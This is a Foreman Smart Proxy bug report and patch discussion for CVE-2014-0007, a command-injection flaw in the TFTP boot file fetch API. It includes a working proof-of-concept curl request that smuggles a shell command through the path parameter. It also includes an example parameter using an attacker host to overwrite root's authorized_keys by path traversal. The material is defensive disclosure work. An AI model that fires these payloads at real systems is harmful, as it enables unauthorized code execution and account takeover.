Bug #6086: CVE-2014-0007 - TFTP boot file fetch API permits remote code execution - Smart Proxy - Foreman

Actions

Copy link

Bug #6086

closed

CVE-2014-0007 - TFTP boot file fetch API permits remote code execution

Added by Dominic Cleal about 11 years ago. Updated almost 7 years ago.

Status:

Closed

Priority:

Urgent

Assignee:

Lukas Zapletal

Category:

Security

Target version:

1.4.5

Difficulty:

easy

Triaged:

Bugzilla link:

Pull request:

Fixed in Releases:

Found in Releases:

Red Hat JIRA:

Description

Reported by Lukas Zapletal to the security team and assigned CVE-2014-0007.

The smart proxy's API for fetching files from installation media for TFTP boot files permits remote code execution:

[root@nightly ~]# curl -3 -H "Accept:application/json" -k -X POST -d "dummy=exploit" 'https://localhost:8443/tftp/fetch_boot_file?prefix=a&path=%3Btouch%20%2Ftmp%2Fbusted%3B'
[root@nightly ~]# ll /tmp/busted
-rw-r--r--. 1 foreman-proxy foreman-proxy 0 Jun  5 11:13 /tmp/busted

Files

0001-fixes-6086-CVE-2014-0007-fixed-TFTP-boot-API-remote-.patch	0001-fixes-6086-CVE-2014-0007-fixed-TFTP-boot-API-remote-.patch	1.67 KB	Patch v1	Lukas Zapletal, 06/06/2014 10:31 AM
0001-fixes-6086-CVE-2014-0007-fixed-TFTP-boot-API-remote-.patch	0001-fixes-6086-CVE-2014-0007-fixed-TFTP-boot-API-remote-.patch	1.45 KB		Lukas Zapletal, 06/12/2014 11:05 AM
0001-fixes-6086-CVE-2014-0007-fixed-TFTP-boot-API-remote-.patch	0001-fixes-6086-CVE-2014-0007-fixed-TFTP-boot-API-remote-.patch	2.5 KB		Greg Sutcliffe, 06/16/2014 11:56 AM
0001-Fixes-6086-stop-remote-command-execution-and-path-ex.patch	0001-Fixes-6086-stop-remote-command-execution-and-path-ex.patch	2.53 KB	v4 patch	Dominic Cleal, 06/18/2014 08:11 AM

Updated by Lukas Zapletal about 11 years ago

Status changed from New to Assigned
Assignee set to Lukas Zapletal
Difficulty set to trivial

Updated by Lukas Zapletal about 11 years ago

File 0001-fixes-6086-CVE-2014-0007-fixed-TFTP-boot-API-remote-.patch 0001-fixes-6086-CVE-2014-0007-fixed-TFTP-boot-API-remote-.patch added

Ok here is my analysis and patch.

Foreman application calls this API with two parameters. The source is URL from which the file should be downloaded, which is easy to fix - we just need escape for shell. Destination string is in the following format:

boot/Operatingsystemname-X.Y-filename

which is usually

boot/RHEL-6.5-vmlinuz

Operating system name and major/minor version is user's input. Our constraints are:

os name = Not blank, no whitespace
minor, major = Must be number

This destination is then handed over to wget to download from the given URL to the destination file. To fix this bug and not to introduce possibility to overwrite arbitrary file, we must not allow an attacker to process inputs like:

src=http://attacker.site.com/my_keys&dst=../../../root/.ssh/authorized_keys

because that could lead to different issue. Therefore my patch introduces new method escape_for_filename which replaces POSIX special characters \0 and / with underscore.

The result is also filtered through escape_for_shell because it is used on the command line as well.

This patch can possibly break Foreman if user has an operating system defined with slash in the name - we should add this character to the validator.

Updated by Dominic Cleal about 11 years ago

Subject changed from CVE-2014-0007 - TFTP boot file fetch API permits remote code execution to EMBARGOED: CVE-2014-0007 - TFTP boot file fetch API permits remote code execution

Updated by Dominic Cleal about 11 years ago

Translation missing: en.field_release set to 16

Updated by Lukas Zapletal about 11 years ago

Status changed from Assigned to Ready For Testing

Updated by Dominic Cleal about 11 years ago

Target version changed from 1.8.2 to 1.8.1

Updated by Lukas Zapletal about 11 years ago

File 0001-fixes-6086-CVE-2014-0007-fixed-TFTP-boot-API-remote-.patch 0001-fixes-6086-CVE-2014-0007-fixed-TFTP-boot-API-remote-.patch added
Difficulty changed from trivial to easy

Here is my second attempt. It does fix the remote execution and in addition, it does check if the resulting file is wihin the give TFTPROOT directory configurated. If not, an error is thrown:

$ curl -3 -H "Accept:application/json" -k -X POST -d "dummy=exploit" 'http://localhost:8443/tftp/fetch_boot_file?prefix=../../tmp/test&path=http://localhost/test'
TFTP: Failed to fetch boot file: TFTP destination outside of tftproot

There is one other thing we need to take into account. With this patch, attacker is not able to write outside of the tftproot, but she is able to overwrite any file. There is a chance to build own image/initrd pair that would execute malicious code when a host is rebooted in build mode. The attacker needs to fit into the timeframe when image/kernel was deployed but the host was not yet booted. This timeframe is short, but there is a chance to do it (repating this API call).

One solution is to put an unique id only known to Foreman (maybe the provisioning token) to the filename. This should also prevent overwrites when multiple hosts are booting same distro. I think it is not important security issue, but if you confirm, I can create new issue for this problem and we may consider to put this on the upcoming sprints.

#10

Updated by Dominic Cleal about 11 years ago

Translation missing: en.field_release changed from 16 to 19

#12

Updated by Greg Sutcliffe about 11 years ago

File 0001-fixes-6086-CVE-2014-0007-fixed-TFTP-boot-API-remote-.patch 0001-fixes-6086-CVE-2014-0007-fixed-TFTP-boot-API-remote-.patch added

#13

Updated by Dominic Cleal about 11 years ago

Thanks for the tests Greg - unfortunately they fail on 1.8.7 as it's using File.absolute_path, which is only available on 1.9+.

  1) Error:
test_paths_inside_tftp_directory_dont_raise_errors(TftpTest):
NoMethodError: undefined method `absolute_path' for File:Class
    ./lib/proxy/tftp.rb:102:in `fetch_boot_file'
    /home/dcleal/code/foreman/smart-proxy/test/tftp_test.rb:30:in `send'
    /home/dcleal/code/foreman/smart-proxy/test/tftp_test.rb:30:in `test_paths_inside_tftp_directory_dont_raise_errors'
    /home/dcleal/.rvm/gems/ruby-1.8.7-p374@proxy/gems/mocha-1.1.0/lib/mocha/integration/test_unit/ruby_version_186_and_above.rb:29:in `__send__'
    /home/dcleal/.rvm/gems/ruby-1.8.7-p374@proxy/gems/mocha-1.1.0/lib/mocha/integration/test_unit/ruby_version_186_and_above.rb:29:in `run'

  2) Failure:
test_paths_outside_tftp_directory_raise_errors(TftpTest)
    [/home/dcleal/code/foreman/smart-proxy/test/tftp_test.rb:37:in `test_paths_outside_tftp_directory_raise_errors'
     /home/dcleal/.rvm/gems/ruby-1.8.7-p374@proxy/gems/mocha-1.1.0/lib/mocha/integration/test_unit/ruby_version_186_and_above.rb:29:in `__send__'
     /home/dcleal/.rvm/gems/ruby-1.8.7-p374@proxy/gems/mocha-1.1.0/lib/mocha/integration/test_unit/ruby_version_186_and_above.rb:29:in `run']:
<RuntimeError> exception expected but was
Class: <NoMethodError>
Message: <"undefined method `absolute_path' for File:Class">
---Backtrace---
./lib/proxy/tftp.rb:102:in `fetch_boot_file'
/home/dcleal/code/foreman/smart-proxy/test/tftp_test.rb:38:in `send'
/home/dcleal/code/foreman/smart-proxy/test/tftp_test.rb:38:in `test_paths_outside_tftp_directory_raise_errors'
/home/dcleal/code/foreman/smart-proxy/test/tftp_test.rb:37:in `test_paths_outside_tftp_directory_raise_errors'
/home/dcleal/.rvm/gems/ruby-1.8.7-p374@proxy/gems/mocha-1.1.0/lib/mocha/integration/test_unit/ruby_version_186_and_above.rb:29:in `__send__'
/home/dcleal/.rvm/gems/ruby-1.8.7-p374@proxy/gems/mocha-1.1.0/lib/mocha/integration/test_unit/ruby_version_186_and_above.rb:29:in `run'
---------------

#15

Updated by Dominic Cleal about 11 years ago

Status changed from Ready For Testing to Pending

#17

Updated by Dominic Cleal about 11 years ago

File 0001-Fixes-6086-stop-remote-command-execution-and-path-ex.patch 0001-Fixes-6086-stop-remote-command-execution-and-path-ex.patch added

#18

Updated by Dominic Cleal about 11 years ago

Subject changed from EMBARGOED: CVE-2014-0007 - TFTP boot file fetch API permits remote code execution to CVE-2014-0007 - TFTP boot file fetch API permits remote code execution
Description updated (diff)
Private changed from Yes to No

#19

Updated by Anonymous about 11 years ago

Status changed from Pending to Closed
% Done changed from 0 to 100

Actions

Copy link

Also available in: Atom PDF

Project

General

Custom queries

Profile

Foreman » Smart Proxy

Bug #6086

CVE-2014-0007 - TFTP boot file fetch API permits remote code execution

Updated by Lukas Zapletal about 11 years ago

Updated by Lukas Zapletal about 11 years ago

Updated by Lukas Zapletal about 11 years ago

Updated by Dominic Cleal about 11 years ago

Updated by Dominic Cleal about 11 years ago

Updated by Dominic Cleal about 11 years ago

Updated by Lukas Zapletal about 11 years ago

Updated by Dominic Cleal about 11 years ago

Updated by Lukas Zapletal about 11 years ago

Updated by Dominic Cleal about 11 years ago

Updated by Dominic Cleal about 11 years ago

Updated by Greg Sutcliffe about 11 years ago

Updated by Dominic Cleal about 11 years ago

Updated by Greg Sutcliffe about 11 years ago

Updated by Dominic Cleal about 11 years ago

Updated by Lukas Zapletal about 11 years ago

Updated by Dominic Cleal about 11 years ago

Updated by Dominic Cleal about 11 years ago

Updated by Anonymous about 11 years ago

Updated by Dominic Cleal about 11 years ago